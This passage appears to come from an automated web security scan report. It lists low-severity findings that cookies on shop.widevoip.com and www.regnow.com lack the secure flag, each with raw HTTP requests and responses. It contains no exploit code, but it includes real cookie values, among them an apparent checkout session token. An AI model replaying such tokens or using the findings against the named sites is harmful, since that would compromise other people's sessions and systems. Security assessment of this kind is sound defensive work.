Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3D3wkelsM%2BAB4%3D6dA5238occw%3Dg4BrSunH6Xc%3DvUCdZwdXaeE%3D; expires=Sat, 04-Jun-2011 15:26:54 GMT; path=/; domain=shop.widevoip.com
Content-Length: 561
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

{
'products': [
   {
       'id': 4,
       'link': 'http://shop.widevoip.com/product.php?id_product=4',
       'quantity': 1,
       'priceByLine': '224,14 ...',
       'name': 'Aastr
...[SNIP]...

7.12. https://shop.widevoip.com/index.php/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /index.php/index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php/index.php HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://shops.oscommerce.com/live_shops_frameset_header.php?url=https://www.widevoip.com/shop/index.php

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:26:20 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DzGE6CEK%2BXc8%3DmhLuDpazsbg%3DQ13xiiAvZnQ%3D3iWrQypkK1M%3DCdeuoTucLxw%3D; expires=Sat, 04-Jun-2011 15:26:20 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DzGE6CEK%2BXc8%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DPxm8lIuEK70%3DqCqiIdQ%2FjtA%3DO7fC4it1KIQ%3D; expires=Sat, 04-Jun-2011 15:26:20 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DzGE6CEK%2BXc8%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DMXL1tr%2BDw7k%3DPxm8lIuEK70%3DglGjERM1roc%3DGVznBQe8dzo%3D; expires=Sat, 04-Jun-2011 15:26:20 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DzGE6CEK%2BXc8%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DMXL1tr%2BDw7k%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DCd9NKtmFnms%3DgU1t2cjcXek%3DZxwBfJHKDnw%3DtoENHMEg8KU%3D; expires=Sat, 04-Jun-2011 15:26:20 GMT; path=/; domain=shop.widevoip.com
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta na
...[SNIP]...

7.13. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /modules/blockcart/blockcart-set-collapse.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /modules/blockcart/blockcart-set-collapse.php?ajax_blockcart_display=expand&rand=1305473193548 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:26:39 GMT
Server: Apache
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DTR8L%2FDHa3UE%3DaGT%2Bje8pLuM%3DlzyeSQtGF%2F4%3DtoENHMEg8KU%3D; expires=Sat, 04-Jun-2011 15:26:39 GMT; path=/; domain=shop.widevoip.com
Content-Length: 59
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

expand status of the blockcart module updated in the cookie

7.14. https://www.regnow.com/checkout/cart/edit

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_loc